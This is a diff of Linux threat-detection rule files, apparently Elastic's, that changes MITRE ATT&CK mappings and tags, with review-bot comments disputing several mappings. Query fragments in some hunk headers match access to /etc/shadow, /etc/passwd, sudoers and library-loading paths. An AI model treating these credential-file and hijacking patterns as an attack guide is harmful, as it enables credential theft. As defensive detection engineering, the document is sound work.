@@ -108,19 +134,15 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml index 6eae96657f5..cfc4377bf4d 100644 --- a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -85,7 +85,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -118,6 +126,21 @@ file.path : ("/usr/lib/yum-plugins/*", "/etc/yum/pluginconf.d/*") and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -127,3 +150,11 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml index 4258204ccb0..bfc29e3bbe6 100644 --- a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml +++ b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
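Review bot: The second `[[rule.threat]]` entry appended at the end of the `@@ -127,3 +150,11 @@` hunk carries only `[rule.threat.tactic]` TA0005 Defense Evasion and no technique, so it yields a tactic tag with nothing in ATT&CK behind it, and nothing in the hunk shows which evasion technique a plugin file under `/usr/lib/yum-plugins/` is meant to represent. Either attach the technique that motivates the tactic or remove the entry and the `"Tactic: Defense Evasion"` tag added in the preceding tags hunk. Within the Persistence entry, T1546.016 Installer Packages already covers a package-manager plugin; the additional T1543 Create or Modify System Process looks like a loose fit — worth confirming with the rule author.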
@@ -87,7 +87,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -100,16 +112,29 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique.subtechnique]] -id = "T1222.002" -name = "Linux and Mac File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/002/" +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml index 724edb03756..1e3ddd54ee1 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
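Review bot: The `@@ -100,16 +112,29 @@` hunk replaces T1222.002 Linux and Mac File and Directory Permissions Modification — the technique that literally describes a chown/chmod on a protected file — with T1068 Exploitation for Privilege Escalation, which ATT&CK reserves for exploiting software vulnerabilities; changing ownership or mode of a sensitive file is abuse of existing privilege or misconfiguration, not exploitation. Keep `id = "T1222"` with the `T1222.002` sub-technique (ATT&CK lists it under Defense Evasion) and add T1003.008 only if the rule really fires on reads, which the `event.type == "start"` process query in the header context does not show. The tags rewritten in the preceding `@@ -87,7 +87,19 @@` hunk should then mirror whichever tactics remain.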
@@ -119,11 +119,6 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml index a71a1c7ecf2..cbb17f3d837 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/15" [rule] author = ["Elastic"] @@ -118,16 +118,6 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_dac_permissions.toml b/rules/linux/privilege_escalation_dac_permissions.toml index 0071f7af161..d6e99458e84 100644 --- a/rules/linux/privilege_escalation_dac_permissions.toml +++ b/rules/linux/privilege_escalation_dac_permissions.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
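Review bot: The `@@ -119,11 +119,6 @@` hunk removes T1574 Hijack Execution Flow from a rule that, per its filename, detects a crafted `nsswitch.conf` being created; if the exploit path relies on steering which NSS library gets loaded, T1574 is the technique that names that mechanism, while the remaining T1068 names only the goal. Both sit under the same TA0004 entry and do not conflict, so nothing forced the removal — suggest restoring the `id = "T1574"` technique block. The enclosing `[[rule.threat]]` entry starts before this hunk.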
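Review bot: The `@@ -118,16 +118,6 @@` hunk drops T1548.003 Sudo and Sudo Caching from a sudo-specific rule (`..._sudo_chroot_execution`), leaving T1068 alone; T1548.003 is the sub-technique analysts pivot on for sudo abuse and it shares the TA0004 entry with T1068, so the duplicate-tactic concern does not apply. Suggest restoring the `T1548` technique block together with its `T1548.003` sub-technique. The enclosing `[[rule.threat]]` entry starts before this hunk.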
@@ -81,7 +81,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -111,42 +118,15 @@ process.command_line:(*/etc/sudoers* or */etc/passwd* or */etc/shadow* or */root framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" - -[[rule.threat.technique.subtechnique]] -id = "T1003.008" -name = "/etc/passwd and /etc/shadow" -reference = "https://attack.mitre.org/techniques/T1003/008/" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.004" -name = "Private Keys" -reference = "https://attack.mitre.org/techniques/T1552/004/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name"] diff --git a/rules/linux/privilege_escalation_enlightenment_window_manager.toml b/rules/linux/privilege_escalation_enlightenment_window_manager.toml index e1b8b16be7c..163762f1cb3 100644 --- a/rules/linux/privilege_escalation_enlightenment_window_manager.toml +++ b/rules/linux/privilege_escalation_enlightenment_window_manager.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] 
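Review bot: The `@@ -111,42 +118,15 @@` hunk removes T1003.008 (`/etc/passwd and /etc/shadow`) and T1552.004 (Private Keys) although the query context in the hunk header still matches `*/etc/shadow*` and `*/root*` command lines — exactly the artefacts those techniques name — and the remaining T1068 describes vulnerability exploitation, which a capability-backed file read is not. Keep the Credential Access entry (T1003.008 / T1552.004) and restore `"Tactic: Credential Access"` in the tags rewritten by the preceding `@@ -81,7 +81,14 @@` hunk; if Privilege Escalation is retained, the removed T1548 Abuse Elevation Control Mechanism was the closer fit than T1068.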
@@ -102,23 +102,14 @@ Enlightenment, a Linux window manager, can be exploited for privilege escalation [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.001" -name = "Setuid and Setgid" -reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml index d4788a96ec1..d9f136f68e5 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -104,18 +104,24 @@ The CAP_SYS_PTRACE capability in Linux allows processes to trace and control oth [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + 
diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml index 054d95fe8dc..b03edb7d5b6 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -47,7 +47,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -97,18 +106,53 @@ GDB, a debugger, can be granted the CAP_SYS_PTRACE capability, allowing it to tr [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/linux/privilege_escalation_kworker_uid_elevation.toml b/rules/linux/privilege_escalation_kworker_uid_elevation.toml index 7d5039f65fc..5c695d128cc 100644 --- a/rules/linux/privilege_escalation_kworker_uid_elevation.toml +++ b/rules/linux/privilege_escalation_kworker_uid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] 
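Review bot: The `@@ -97,18 +106,53 @@` hunk is visibly hand-edited: `reference = ".../tactics/TA0004/"` runs straight into the next `[[rule.threat]]` with no separating blank line, `framework` is followed immediately by `[[rule.threat.technique]]`, and runs of two and three empty lines precede the `[rule.threat.tactic]` tables, unlike the other hunks in this patch. Please re-serialize the file with the project's rule formatter before merging so the layout matches the rest of the rule set. On substance, the T1071 / TA0011 entry adds Command and Control to a debugger-network-connection rule without any protocol evidence visible here; if the intent is that gdb's outbound connection is treated as a C2 channel, the rule description should say so, otherwise the mapping is a guess.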
@@ -102,31 +102,31 @@ Kworker processes are integral to Linux, handling tasks like interrupts and back [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.013" +name = "KernelCallbackTable" +reference = "https://attack.mitre.org/techniques/T1574/013/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml index a6d82d08750..046ac09030c 100644 --- a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml +++ b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] 
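Review bot: The `@@ -102,31 +102,31 @@` hunk maps this Linux rule (see the `Kworker processes are integral to Linux` header context) to `T1574.013` KernelCallbackTable, which in ATT&CK is a Windows-only sub-technique about overwriting a process's PEB callback table; it cannot describe a kworker UID change and will mislead anyone pivoting on it. The hunk also deletes T1036.005 Match Legitimate Resource Name or Location, the technique that describes a process posing as `kworker`, which is the premise the rule name rests on. Suggest restoring the T1036 / T1036.005 Defense Evasion entry, removing the `T1574.013` sub-technique block, and keeping T1014 Rootkit only if the rule description supports it. The blank-line layout here also departs from the other files in the patch.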
@@ -93,7 +93,15 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -116,28 +124,11 @@ id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml index b3d0de5378e..af3b13bbbe3 100644 --- a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml +++ b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml 
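Review bot: The `@@ -116,28 +124,11 @@` hunk removes the Persistence entry for T1574.006 Dynamic Linker Hijacking and the `@@ -93,7 +93,15 @@` tags hunk drops `"Tactic: Persistence"`, leaving only Privilege Escalation; ATT&CK lists T1574.006 under Persistence as well, and, per the filename, modifying an LD_PRELOAD-style shared object is primarily a persistence mechanism. The two old entries were distinct tactics (TA0003 and TA0004), not duplicates, so a per-tactic dedupe did not require this. If the removal is intentional, a sentence in the rule description explaining why persistence is out of scope would help; otherwise restore the TA0003 entry and tag.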
@@ -2,7 +2,7 @@ creation_date = "2023/07/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -46,7 +46,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -110,24 +118,29 @@ Symbolic links in Linux are shortcuts that point to files or directories, facili framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml index a34e1b9a628..e2af607fc77 100644 --- a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml +++ b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
@@ -93,7 +93,20 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -109,11 +122,47 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1601" name = "Modify System Image" reference = "https://attack.mitre.org/techniques/T1601/" +[[rule.threat.technique.subtechnique]] +id = "T1601.001" +name = "Patch System Image" +reference = "https://attack.mitre.org/techniques/T1601/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml index 1fe818619b2..9df3d417f82 100644 --- a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml +++ b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
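Review bot: The first entry added in the `@@ -109,11 +122,47 @@` hunk maps kexec loading to `T1611` Escape to Host, an ATT&CK technique about breaking out of a container onto its host; loading a replacement kernel via kexec on the host is not that, so the new Privilege Escalation entry is backed by the wrong technique. If no privilege-escalation technique genuinely applies, drop the entry and the `"Tactic: Privilege Escalation"` tag added in the preceding tags hunk; the T1547.006 Kernel Modules and Extensions entry is the closest fit of the additions and is fine. The added `T1601.001` Patch System Image sub-technique is likewise defined for network devices in ATT&CK — the parent was already present, so I would not extend it.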
@@ -100,23 +100,31 @@ file where host.os.type == "linux" and file.path : "/*GCONV_PATH*" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml index 8859e41599e..57ae0855eb1 100644 --- a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml +++ b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2023/12/11" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
